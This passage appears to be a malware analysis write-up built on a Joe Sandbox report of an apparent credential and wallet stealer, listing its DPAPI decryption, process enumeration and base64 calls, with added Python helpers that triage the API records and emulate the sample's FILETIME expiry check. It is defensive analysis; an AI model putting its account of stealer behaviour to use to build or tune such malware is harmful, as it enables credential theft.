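    return {ref: classify(calls) for ref, calls in split_functions(report).items()}


if __name__ == "__main__":
    for ref, tags in triage(SAMPLE_REPORT).items():
        print(ref, sorted(tags))
```

Running it on the constructed input tags 002EE4A2 as directory enumeration aimed at a wallet file, 002E9AEF as a base64 decoder, 002F696C as a time check that can end the process, and 002E724D as DPAPI decryption. The dwFlags check matters: CryptStringToBinaryA with other flag values decodes hex or PEM-wrapped data, so the value 0x1 is what ties these records to base64-encoded stored secrets.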
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 002F696C
                  • sscanf.NTDLL ref: 002F6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002F69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002F69C0
                  • ExitProcess.KERNEL32 ref: 002F69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: c0266ccbb7b7d626f975344b94cfa31542339afa19fb59a738bd1445a32bd54e
                  • Instruction ID: 4d586b01141884ea609d3f29af4bd2f1cf75a37bd4633b9af08acf2d2c36f7dd
                  • Opcode Fuzzy Hash: c0266ccbb7b7d626f975344b94cfa31542339afa19fb59a738bd1445a32bd54e
                  • Instruction Fuzzy Hash: B821ECB5D1020DABCF04EFE4D9459EEB7B5FF58300F04852AE506E3250EB745619CB65
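The GetSystemTime, sscanf, two SystemTimeToFileTime calls and ExitProcess in the record above have the shape of a build-expiry check: a date string carried by the sample is parsed with sscanf, it and the current time are both converted to FILETIME so they can be compared as 64-bit integers, and the process exits when the deadline has passed. The emulation below is an added example by the editor, not code recovered from the sample. Two things in it are assumptions: the date format the sscanf call parses (taken here as `YYYY-MM-DD`; the real format string is not visible in the report) and the direction of the comparison (exit when the current time is later than the deadline, inferred from the API order). The FILETIME arithmetic itself uses the documented epoch of 1601-01-01 UTC and 100-nanosecond units.

```python
"""Emulation of a FILETIME-based expiry check of the kind suggested by the
GetSystemTime / sscanf / SystemTimeToFileTime / ExitProcess sequence.
Added example; the date format and comparison direction are assumptions."""
import re
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HUNDRED_NS_PER_SECOND = 10_000_000
HUNDRED_NS_PER_MICROSECOND = 10


def utc(year: int, month: int, day: int, hour: int = 0, minute: int = 0) -> datetime:
    """Convenience constructor for an aware UTC datetime (GetSystemTime is UTC)."""
    return datetime(year, month, day, hour, minute, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """SystemTimeToFileTime equivalent: aware datetime -> 64-bit FILETIME."""
    if dt.tzinfo is None:
        raise ValueError("GetSystemTime yields UTC; pass an aware datetime")
    delta = dt - FILETIME_EPOCH
    # integer arithmetic throughout: a float would lose precision at 1e17
    seconds = delta.days * 86_400 + delta.seconds
    return seconds * HUNDRED_NS_PER_SECOND + delta.microseconds * HUNDRED_NS_PER_MICROSECOND


def from_filetime(ft: int) -> datetime:
    """Inverse, for turning a FILETIME seen in a register or dump back into a date."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // HUNDRED_NS_PER_MICROSECOND)


def parse_deadline(text: str) -> datetime:
    """Stand-in for the sscanf call. ASSUMPTION: the embedded string is
    'YYYY-MM-DD'; the real format string is not visible in the report."""
    m = re.fullmatch(r"(\d{4})-(\d{2})-(\d{2})", text.strip())
    if not m:
        raise ValueError(f"deadline {text!r} not in the assumed YYYY-MM-DD form")
    year, month, day = (int(g) for g in m.groups())
    return utc(year, month, day)


def would_exit(deadline: str, now: datetime) -> bool:
    """Both times go through the FILETIME conversion so they compare as plain
    64-bit integers. ASSUMPTION: ExitProcess is reached once the current
    FILETIME is greater than the deadline's (inferred from the API order)."""
    return to_filetime(now) > to_filetime(parse_deadline(deadline))


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    print("current FILETIME:", hex(to_filetime(now)))
    print("would exit for deadline 2024-06-30:", would_exit("2024-06-30", now))
```

When confirming this in a debugger, break after the second SystemTimeToFileTime, read both 64-bit results and feed them to `from_filetime`; the one that does not match the sandbox clock is the embedded deadline, and setting the analysis VM clock before that date keeps the sample running past the check.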
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002E724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002E7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002E72A4
                  • LocalFree.KERNEL32(?), ref: 002E72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 8cafc868ac42c3cc20d600627efcb78fe65e5cbcc710a7d099cc9eb186996a5f
                  • Instruction ID: 03bc11c30e1b53f4288a8e92daa4760e92bf6743e1a69e53694d3e0137a36ced
                  • Opcode Fuzzy Hash: 8cafc868ac42c3cc20d600627efcb78fe65e5cbcc710a7d099cc9eb186996a5f
                  • Instruction Fuzzy Hash: 86011EB5A40208BBEB24DFE4DD4AF9E77B8EF44B00F104155FB05AB2C0D6B0AA059B65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002F961E
                  • Process32First.KERNEL32(00300ACA,00000128), ref: 002F9632
                  • Process32Next.KERNEL32(00300ACA,00000128), ref: 002F9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 002F965C
                  • CloseHandle.KERNEL32(00300ACA), ref: 002F967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: b0da6958e127f7981cd0d6ade9a8d5da3f5fa8d8eb540ad6c496264d99654c38
                  • Instruction ID: dd4bb6326335d66566d2845ed032f1c67f2b9aa86b2d327d65ee7133830af51e
                  • Opcode Fuzzy Hash: b0da6958e127f7981cd0d6ade9a8d5da3f5fa8d8eb540ad6c496264d99654c38
                  • Instruction Fuzzy Hash: D3010C75A1020CEBCB24DFA5CD48BEDB7F8EF58340F104198AA05D6240DB759B95DF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 8H1l$=m{$@Wo=$t|R
                  • API String ID: 0-1693746152
                  • Opcode ID: 71e86c35b7b28be9a58371fa4f559fa6cb3d0cf886d38aa1605be1cda0f8678c
                  • Instruction ID: bf630ef2da9334716930e855e78d876ed9ac64673c0efc5b006697550700d479
                  • Opcode Fuzzy Hash: 71e86c35b7b28be9a58371fa4f559fa6cb3d0cf886d38aa1605be1cda0f8678c
                  • Instruction Fuzzy Hash: 4EB207F36082049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744E63598418697
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,002E5184,40000001,00000000,00000000,?,002E5184), ref: 002F8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 4837d02e40bd09e3f4968a1013d76845c8730a0eab32e05c51ba47dd79d2acd1
                  • Instruction ID: d3ebb6565d0f9a8bb1989eae4e2e8b8ab36eedc07bac1771b37812b07f854ddf
                  • Opcode Fuzzy Hash: 4837d02e40bd09e3f4968a1013d76845c8730a0eab32e05c51ba47dd79d2acd1
                  • Instruction Fuzzy Hash: C4112E70220209FFDB00CF64D885FB7B3A9AF8A740F109568FA158B250DB75EC55DB61
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0132EA50,00000000,?,00300E10,00000000,?,00000000,00000000), ref: 002F7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0132EA50,00000000,?,00300E10,00000000,?,00000000,00000000,?), ref: 002F7A7D
                  • wsprintfA.USER32 ref: 002F7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: e94a9c6dc2af06aa5595650546d1b31fad29e5688d68f53a02ce375787c89349
                  • Instruction ID: 7d8a5f7a03bb02577dbbd190f4ccebc181e95f7b4feb310fcf8fb247c834a116
                  • Opcode Fuzzy Hash: e94a9c6dc2af06aa5595650546d1b31fad29e5688d68f53a02ce375787c89349
                  • Instruction Fuzzy Hash: 21118EB1A45218EBEB208F54DC49FA9B778FB05761F1043AAEA1A932C0D7741A45CF51
                  APIs
                  • CoCreateInstance.COMBASE(002FE118,00000000,00000001,002FE108,00000000), ref: 002F3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002F37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: a36e6e8dffd58209834fff857f5902e84f0700546ccfc8da9ee011ed8ea8a769
                  • Instruction ID: ec54402cdabd06b057cca9611eb8ea1be76b5f10ce9c88990bae479cd3b59e55
                  • Opcode Fuzzy Hash: a36e6e8dffd58209834fff857f5902e84f0700546ccfc8da9ee011ed8ea8a769
                  • Instruction Fuzzy Hash: 6741F870A10A2C9FDB24DB58CC94BABB7B5BB48702F4041D8E608E72D0D7B16E85CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002E9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002E9BA3
                  • LocalFree.KERNEL32(?), ref: 002E9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 6e76929d9d564f97f8ccd86243ed6468064b322ea54642b5d1431c6f0c85502d
                  • Instruction ID: c3cc5fe904fe979ff396aea7a1ac78480c7ba51d289a930c93ca9e678e801a0d
                  • Opcode Fuzzy Hash: 6e76929d9d564f97f8ccd86243ed6468064b322ea54642b5d1431c6f0c85502d
                  • Instruction Fuzzy Hash: A91109B8A0020AEFCB04DF94D985AAEB7B5FF89300F1045A9F815A7350D770AE55CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: usr$w'k
                  • API String ID: 0-1752605985
                  • Opcode ID: a510ef89e07127b16c922a6bda51a5282a82cf7e5a2dba7102da9ddb83ade081
                  • Instruction ID: fc6f518b5d978cbb21f92e5c129436bb55197603188fab55f9527ed9fc545a42
                  • Opcode Fuzzy Hash: a510ef89e07127b16c922a6bda51a5282a82cf7e5a2dba7102da9ddb83ade081
                  • Instruction Fuzzy Hash: 60B217F360C204AFE704AE2DEC8577AB7E9EBD4720F1A853DE6C4C7744EA3558018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "Y$"Y$=:^
                  • API String ID: 0-400678772
                  • Opcode ID: 0e5b85ea1259df2d18653c0e9e0dad59baee4a26f0a459a18c6def63808a0788
                  • Instruction ID: 9b849eb0f6cc23d7f9cdcb7fa6835240e728a09ef98d40f06d782fb11e984274
                  • Opcode Fuzzy Hash: 0e5b85ea1259df2d18653c0e9e0dad59baee4a26f0a459a18c6def63808a0788
                  • Instruction Fuzzy Hash: CB714AF3A083045FF3049E19EC8177BB7EAEBD4320F2A853DE98583780E93A5C058656
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2,/v$Y`?$f/:+
                  • API String ID: 0-3509502552
                  • Opcode ID: 498fa2f64c52aeba4e9c1e91f417b9a9b2aa22998f2ffdc63649923319429494
